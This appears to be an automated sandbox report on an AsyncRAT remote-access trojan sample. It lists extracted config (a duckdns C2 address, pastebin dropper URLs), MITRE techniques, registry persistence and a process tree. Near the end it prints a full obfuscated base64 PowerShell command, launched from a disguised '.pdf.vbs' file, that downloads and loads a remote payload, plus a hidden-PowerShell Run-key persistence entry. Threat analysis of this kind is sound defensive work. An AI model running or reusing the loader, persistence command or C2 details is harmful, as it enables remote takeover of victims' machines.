asyncrat | hxxps://drive[.]google[.]com/open?id=1Pqr5-1ID6R8AHGKsouJ7wYyHjVlIKmNF

Analysis

max time kernel
149s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-es
resource tags

arch:x64arch:x86image:win10v2004-20241007-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
07-11-2024 19:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/open?id=1Pqr5-1ID6R8AHGKsouJ7wYyHjVlIKmNF

Score

10^/10

asyncrat octubre defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Octubre

dcrat2011.duckdns.org:2011

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 12 IoCs

flow	pid	Process
128	3616	powershell.exe
131	1840	powershell.exe
133	3616	powershell.exe
135	3616	powershell.exe
136	3700	powershell.exe
137	3384	powershell.exe
140	1252	powershell.exe
141	1552	powershell.exe
142	3700	powershell.exe
145	3700	powershell.exe
146	3384	powershell.exe
148	3384	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3616	powershell.exe
3700	powershell.exe
3384	powershell.exe
396	powershell.exe
4768	powershell.exe
4792	powershell.exe
1584	powershell.exe
1836	powershell.exe
2932	powershell.exe
3976	powershell.exe
4968	powershell.exe
1036	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\________fioku____________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\________fioku____________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\________fioku____________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
8	drive.google.com
127	pastebin.com
128	pastebin.com
136	pastebin.com
137	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3616 set thread context of 4324	3616	powershell.exe	143
PID 3700 set thread context of 1268	3700	powershell.exe	154
PID 3384 set thread context of 1584	3384	powershell.exe	156

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\display.PNF	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4240	PING.EXE
4768	PING.EXE
3056	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754803438149024"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	7zFM.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4240	PING.EXE
4768	PING.EXE
3056	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3600	chrome.exe
3600	chrome.exe
1004	7zFM.exe
1004	7zFM.exe
2932	powershell.exe
2932	powershell.exe
2932	powershell.exe
3616	powershell.exe
3616	powershell.exe
3616	powershell.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
3976	powershell.exe
3976	powershell.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
3976	powershell.exe
3976	powershell.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
1004	7zFM.exe
1004	7zFM.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
1004	7zFM.exe
1004	7zFM.exe
1036	powershell.exe
1036	powershell.exe
1036	powershell.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
1900	chrome.exe
1900	chrome.exe
1004	7zFM.exe
1004	7zFM.exe
1900	chrome.exe
1900	chrome.exe
1252	powershell.exe
1252	powershell.exe
1252	powershell.exe
1552	powershell.exe
1552	powershell.exe
1552	powershell.exe
64	powershell.exe
64	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
64	powershell.exe
1584	powershell.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
1836	powershell.exe
1836	powershell.exe
1840	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1004	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe
Token: SeShutdownPrivilege	3600	chrome.exe
Token: SeCreatePagefilePrivilege	3600	chrome.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
1004	7zFM.exe
1004	7zFM.exe
1004	7zFM.exe
1004	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe
3600	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3600 wrote to memory of 4036	3600	chrome.exe	83
PID 3600 wrote to memory of 4036	3600	chrome.exe	83
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 1080	3600	chrome.exe	84
PID 3600 wrote to memory of 2288	3600	chrome.exe	85
PID 3600 wrote to memory of 2288	3600	chrome.exe	85
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86
PID 3600 wrote to memory of 1716	3600	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.google.com/open?id=1Pqr5-1ID6R8AHGKsouJ7wYyHjVlIKmNF
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0x84,0x104,0x7ff90f2ecc40,0x7ff90f2ecc4c,0x7ff90f2ecc58
  2⤵
  PID:4036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1996 /prefetch:2
  2⤵
  PID:1080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:8
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:1332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4664,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:8
  2⤵
  PID:3392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4840,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:2408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5252,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5260 /prefetch:8
  2⤵
  PID:3884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3848,i,7266145727840301817,15216540408761560999,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1900

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3736

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3056

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\ad900090014424524524252.,pdf.uu"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:1004
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zOCE3EA7F8\ad900090014424524524252.,pdf.vbs"
  2⤵
  - Checks computer location settings
  PID:4572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bk☹Hg☹Z☹B3☹Gg☹I☹☹9☹C☹☹Jw☹w☹DE☹Jw☹g☹Ds☹J☹B0☹HI☹agBm☹GI☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹agBi☹GM☹bQB4☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹CQ☹UQBQ☹HQ☹YQB2☹C4☹cgBl☹H☹☹b☹Bh☹GM☹ZQ☹o☹Cc☹J☹☹k☹CQ☹J☹☹k☹Cc☹L☹☹n☹EE☹Jw☹p☹C☹☹KQ☹g☹Ds☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹EE☹c☹Bw☹EQ☹bwBt☹GE☹aQBu☹F0☹Og☹6☹EM☹dQBy☹HI☹ZQBu☹HQ☹R☹Bv☹G0☹YQBp☹G4☹LgBM☹G8☹YQBk☹Cg☹J☹Bq☹GI☹YwBt☹Hg☹KQ☹u☹Ec☹ZQB0☹FQ☹eQBw☹GU☹K☹☹n☹FQ☹ZQBo☹HU☹b☹Bj☹Gg☹ZQBz☹Fg☹e☹BY☹Hg☹e☹☹u☹EM☹b☹Bh☹HM☹cw☹x☹Cc☹KQ☹u☹Ec☹ZQB0☹E0☹ZQB0☹Gg☹bwBk☹Cg☹JwBN☹HM☹cQBC☹Ek☹YgBZ☹Cc☹KQ☹u☹Ek☹bgB2☹G8☹awBl☹Cg☹J☹Bu☹HU☹b☹Bs☹Cw☹I☹Bb☹G8☹YgBq☹GU☹YwB0☹Fs☹XQBd☹C☹☹K☹☹n☹D☹☹LwB1☹Fk☹S☹B3☹EE☹LwBy☹C8☹ZQBl☹C4☹ZQB0☹HM☹YQBw☹C8☹Lw☹6☹HM☹c☹B0☹HQ☹a☹☹n☹C☹☹L☹☹g☹CQ☹d☹By☹Go☹ZgBi☹C☹☹L☹